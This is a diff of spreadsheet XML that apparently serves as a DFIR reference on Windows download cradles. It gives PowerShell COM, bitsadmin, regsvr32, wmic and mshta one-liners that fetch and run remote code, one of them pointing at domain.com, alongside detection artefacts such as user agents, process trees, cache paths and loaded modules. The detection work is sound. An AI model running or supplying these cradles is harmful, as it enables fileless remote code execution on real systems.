+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell MsXml COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
+Powershell version: 2+
+Not proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell IE COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+$comIE=New-Object -ComObject InternetExplorer.Application;While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Visible=$False;$comIE.Silent=$True;$comIE.Navigate($Url);While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Document.Body.InnerText;$comIE.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comIE) 
+Powershell version: 2+
+Microsoft Internet Explorer
+Proxy aware</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell Word COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <i/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>$comWord=New-Object -ComObject Word.Application;While($comWord.Busy){Start-Sleep -Seconds 1}$comWord.Visible=$False;$doc=$comWord.Documents.Open($Url);While($comWord.Busy){Start-Sleep -Seconds 1}IEX($doc.Content.Text);$comWord.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comWord)</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Powershell version: 2+
+Microsoft Word installed
+Proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>PowerShell Excel COM Object:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <i/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open($Url[0]);While($comExcel.Busy){Start-Sleep -Seconds 1}IEX(($comExcel.Sheets.Item(1).Range("A1:R"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{$_})-Join"`n");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Powershell version: 2+
+Microsoft Excel installed
+Proxy aware
+memory only</t>
+    </r>
+  </si>
+  <si>
+    <t>Squiglytwo - wmic.exe as a download cradle (not specifically powershell)
+wmic.exe &lt;command&gt; /FORMAT:$Url
+e.g wmic.exe os get /FORMAT:"http://domain.com/test.xsl"</t>
+  </si>
+  <si>
+    <t>GET:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)</t>
+  </si>
+  <si>
+    <t>GET: Mozilla/* (compatible; MSIE *; Windows NT *; Win64; x64; Trident/*; .NET*; .NET CLR *)</t>
+  </si>
+  <si>
+    <t>wmic.exe</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>wmic.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+e.g
+C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\PAEPZ81M\test[1].xsl</t>
+    </r>
+  </si>
+  <si>
+    <t>Child: cmd.exe
+Parent: cmd.exe
+Child: wmic.exe
+Parent: wmic.exe
+Child: Powershell.exe (or other payload)</t>
+  </si>
+  <si>
+    <t xml:space="preserve"> </t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>wmic.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+e.g
+C:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\YZHHC1PX\test[1].xsl</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>wmic.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
+e.g
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8Z3JDJQA\test[1].xsl</t>
+    </r>
+  </si>
+  <si>
+    <t>GET: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Microsoft BITS framework via Bitsadmin.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
 $NULL=bitsadmin /transfer /Download $Url $Outfile; GC $Outfile | IEX
 Powershell 2+
 Proxy capable
 Disk-based - Downloads to specified file</t>
-  </si>
-  <si>
-    <t>Squiglydoo - regsvr32.exe as a download cradle (not specifically powershell)
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Squiglydoo - regsvr32.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
 regsvr32.exe /s /u /i:$Url scrobj.dll
 Proxy aware</t>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>MSHTA.EXE</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-cmd /c 'mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/mgreen27/testing/master/mshta.sct").Exec();close()'
-Proxy aware
-</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell WinHttp COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comWinHttp=new-object -com WinHttp.WinHttpRequest.5.1;$comWinHttp.open('GET',$Url,$false);$comWinHttp.send();IEX $comWinHttp.responseText 
-Powershell version: 2+
-Not proxy aware
-memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell MsXml COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET',$Url,$False);$comMsXml.Send();IEX $comMsXml.ResponseText 
-Powershell version: 2+
-Not proxy aware
-memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell IE COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-$comIE=New-Object -ComObject InternetExplorer.Application;While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Visible=$False;$comIE.Silent=$True;$comIE.Navigate($Url);While($comIE.Busy){Start-Sleep -Seconds 1}$comIE.Document.Body.InnerText;$comIE.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comIE) 
-Powershell version: 2+
-Microsoft Internet Explorer
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>SquiglyTwo - wmic.exe</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> as a download cradle (not specifically powershell)
+cmd /d wmic.exe os get /FORMAT:"$Url"
 Proxy aware</t>
     </r>
   </si>
@@ -9223,92 +9302,602 @@
         <b/>
         <sz val="12"/>
         <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell Word COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <i/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>$comWord=New-Object -ComObject Word.Application;While($comWord.Busy){Start-Sleep -Seconds 1}$comWord.Visible=$False;$doc=$comWord.Documents.Open($Url);While($comWord.Busy){Start-Sleep -Seconds 1}IEX($doc.Content.Text);$comWord.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comWord)</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Powershell version: 2+
-Microsoft Word installed
-Proxy aware
-memory only</t>
-    </r>
-  </si>
-  <si>
-    <r>
-      <rPr>
-        <b/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri (Body)_x0000_"/>
-      </rPr>
-      <t>PowerShell Excel COM Object:</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-</t>
-    </r>
-    <r>
-      <rPr>
-        <i/>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t>$comExcel=New-Object -ComObject Excel.Application;While($comExcel.Busy){Start-Sleep -Seconds 1}$comExcel.DisplayAlerts=$False;$Null=$comExcel.Workbooks.Open($Url[0]);While($comExcel.Busy){Start-Sleep -Seconds 1}IEX(($comExcel.Sheets.Item(1).Range("A1:R"+$comExcel.Sheets.Item(1).UsedRange.Rows.Count).Value2|?{$_})-Join"`n");$comExcel.Quit();[Void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($comExcel)</t>
-    </r>
-    <r>
-      <rPr>
-        <sz val="12"/>
-        <color theme="1"/>
-        <rFont val="Calibri"/>
-        <family val="2"/>
-        <scheme val="minor"/>
-      </rPr>
-      <t xml:space="preserve">
-Powershell version: 2+
-Microsoft Excel installed
-Proxy aware
-memory only</t>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Regsvr32.exe loads:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll
+EDP util - C:\Windows\System32\edputil.dll
+Filter Library - C:\Windows\System32\fltLib.dll
+OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+Application Experience Program Cache - C:\Windows\System32\aepic.dll
+Cloud API user mode API - C:\Windows\System32\cldapi.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+Software Licensing Client Dll - C:\Windows\System32\sppc.dll
+Software Licensing Client Dll - C:\Windows\System32\slc.dll
+Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpClient.dll
+Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+IOfficeAntiVirus Module - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpOAV.dll
+Userenv - C:\Windows\System32\userenv.dll
+Anti-Malware Scan Interface - C:\Windows\System32\amsi.dll
+Windows Lockdown Policy - C:\Windows\System32\wldp.dll
+COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows ® Script Component Runtime - C:\Windows\System32\scrobj.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Cryptographic Service Provider API - C:\Windows\System32\cryptsp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Data Protection API - C:\Windows\System32\dpapi.dll
+ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows HTTP Services - C:\Windows\System32\winhttp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Windows Socket 2.0 32-Bit DLL - C:\Windows\System32\ws2_32.dll
+Security Support Provider Interface - C:\Windows\System32\sspicli.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Internet Extensions for Win32 - C:\Windows\System32\wininet.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Isolation Library for Internet Explorer - C:\Windows\System32\msIso.dll
+Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
+Windows NT Image Helper - C:\Windows\System32\imagehlp.dll
+User Profile Basic API - C:\Windows\System32\profapi.dll
+Power Profile Helper DLL - C:\Windows\System32\powrprof.dll
+Microsoft WinRT Storage API - C:\Windows\System32\windows.storage.dll
+Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
+OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>wmic.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Application Experience Program Cache - C:\Windows\System32\aepic.dll
+Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.14.17613.18039-0\MpClient.dll
+Cloud API user mode API - C:\Windows\System32\cldapi.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Data Protection API - C:\Windows\System32\dpapi.dll
+EDP util - C:\Windows\System32\edputil.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Filter Library - C:\Windows\System32\fltLib.dll
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Internet Extensions for Win32 - C:\Windows\System32\wininet.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Software Licensing Client Dll - C:\Windows\System32\slc.dll
+Software Licensing Client Dll - C:\Windows\System32\sppc.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Windows NT MARTA provider - C:\Windows\System32\ntmarta.dll
+Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll
+Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>wmic.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Application Compatibility Client Library - C:\Windows\System32\apphelp.dll
